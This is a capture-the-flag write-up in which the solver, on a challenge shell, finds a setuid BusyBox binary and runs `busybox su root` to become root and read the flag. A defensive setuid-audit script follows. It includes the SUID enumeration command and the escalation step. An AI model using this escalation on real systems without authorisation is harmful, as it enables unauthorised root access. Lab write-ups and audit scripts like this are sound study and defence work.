Tags: misc pwn suid 

Here we are given a netcat listener and we have to connect to it.

nc 34.85.38.218 10002

After connecting we will have a shell.

/ $ ls
ls
bin         flag        lost+found  proc        sys
dev         lib         media       root        tmp
ecrypt.ko   lib64       mnt         run         usr
etc         linuxrc     opt         sbin        var
/ $ 

We are currently in the root directory.

Let's try to read the flag:

/ $ cat flag
cat flag
cat: can't open 'flag': Permission denied
/ $ 

Permission denied!!

Let's search for any SUID files on the target system:

find / -perm -u=s -type f 2>/dev/null

This gives us a file named busybox.

Run busybox and it will list all the functions (applets) that are available:

/ $ busybox
busybox
BusyBox v1.35.0 (2022-03-22 21:54:53 JST) multi-call binary.
BusyBox is copyrighted by many authors between 1998-2015.
Licensed under GPLv2. See source distribution for detailed
copyright notices.

Usage: busybox [function [arguments]...]
   or: busybox --list[-full]
   or: busybox --show SCRIPT
   or: busybox --install [-s] [DIR]
   or: function [arguments]...

    BusyBox is a multi-call binary that combines many common Unix
    utilities into a single executable.  Most people will create a
    link to busybox for each function they wish to use and BusyBox
    will act like whatever it was invoked as.

Currently defined functions:
    [, [[, addgroup, adduser, ar, arch, arp, arping, ascii, ash, awk,
    base32, base64, basename, bc, blkid, bunzip2, bzcat, cat, chattr,
    chgrp, chmod, chown, chroot, chrt, chvt, cksum, clear, cmp, cp, cpio,
    crc32, crond, crontab, cttyhack, cut, date, dc, dd, deallocvt,
    delgroup, deluser, devmem, df, diff, dirname, dmesg, dnsd,
    dnsdomainname, dos2unix, du, dumpkmap, echo, egrep, eject, env,
    ether-wake, expr, factor, fallocate, false, fbset, fdflush, fdformat,
    fdisk, fgrep, find, flock, fold, free, freeramdisk, fsck, fsfreeze,
    fstrim, fuser, getopt, getty, grep, gunzip, gzip, halt, hdparm, head,
    hexdump, hexedit, hostid, hostname, hwclock, i2cdetect, i2cdump,
    i2cget, i2cset, i2ctransfer, id, ifconfig, ifdown, ifup, inetd, init,
    insmod, install, ip, ipaddr, ipcrm, ipcs, iplink, ipneigh, iproute,
    iprule, iptunnel, kill, killall, killall5, klogd, last, less, link,
    linux32, linux64, linuxrc, ln, loadfont, loadkmap, logger, login,
    logname, losetup, ls, lsattr, lsmod, lsof, lspci, lsscsi, lsusb, lzcat,
    lzma, lzopcat, makedevs, md5sum, mdev, mesg, microcom, mim, mkdir,
    mkdosfs, mke2fs, mkfifo, mknod, mkpasswd, mkswap, mktemp, modprobe,
    more, mount, mountpoint, mt, mv, nameif, netstat, nice, nl, nohup,
    nologin, nproc, nslookup, nuke, od, openvt, partprobe, passwd, paste,
    patch, pidof, ping, pipe_progress, pivot_root, poweroff, printenv,
    printf, ps, pwd, rdate, readlink, readprofile, realpath, reboot,
    renice, reset, resize, resume, rm, rmdir, rmmod, route, run-init,
    run-parts, runlevel, sed, seq, setarch, setconsole, setfattr,
    setkeycodes, setlogcons, setpriv, setserial, setsid, setuidgid, sh,
    sha1sum, sha256sum, sha3sum, sha512sum, shred, sleep, sort,
    start-stop-daemon, strings, stty, su, sulogin, svc, svok, swapoff,
    swapon, switch_root, sync, sysctl, syslogd, tail, tar, tc, tee, telnet,
    test, tftp, time, top, touch, tr, traceroute, true, truncate, ts, tty,
    ubirename, udhcpc, uevent, umount, uname, uniq, unix2dos, unlink,
    unlzma, unlzop, unxz, unzip, uptime, usleep, uudecode, uuencode,
    vconfig, vi, vlock, w, watch, watchdog, wc, wget, which, who, whoami,
    xargs, xxd, xz, xzcat, yes, zcat
/ $ 

Notice the su applet in this list.

We've got it. Run:

/ $ busybox su root
busybox su root
/ # ls
ls
bin         flag        lost+found  proc        sys
dev         lib         media       root        tmp
ecrypt.ko   lib64       mnt         run         usr
etc         linuxrc     opt         sbin        var
/ # cat flag
cat flag
LINECTF{WOW!_powerful_kernel_oor_oow}

And we have our flag.
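
The SUID search used above, turned into an audit check (an added example, not part of the original writeup): it lists setuid files under a directory and flags BusyBox multi-call binaries like the one found here. The function name audit_suid and the "BusyBox v" banner match are assumptions of this example.

```shell
#!/bin/sh
# Added example: audit a directory tree for setuid files and flag BusyBox
# multi-call binaries, where one setuid bit covers many applets at once.
# Assumption: a file counts as BusyBox if it is named "busybox" or contains
# the banner string "BusyBox v" (as printed in the session above).

audit_suid() {
    root="${1:-/}"
    # -xdev stays on one filesystem; -perm -4000 matches the setuid bit.
    find "$root" -xdev -type f -perm -4000 2>/dev/null |
    while IFS= read -r f; do
        # Numeric owner: the uid the program can run as when executed.
        owner=$(ls -ldn "$f" | awk '{print $3}')
        if [ "$(basename "$f")" = "busybox" ] ||
           grep -aq 'BusyBox v' "$f" 2>/dev/null; then
            echo "HIGH uid=$owner $f setuid multi-call binary, review applets such as su"
        else
            echo "INFO uid=$owner $f"
        fi
    done
}

# Run stand-alone as: sh audit_suid.sh /   (the script name is hypothetical)
if [ "$#" -gt 0 ]; then
    audit_suid "$1"
fi
```

For a HIGH finding, the usual fix is to drop the bit from the multi-call binary (chmod u-s) and ship a separate, minimal binary for the few tools that really need it.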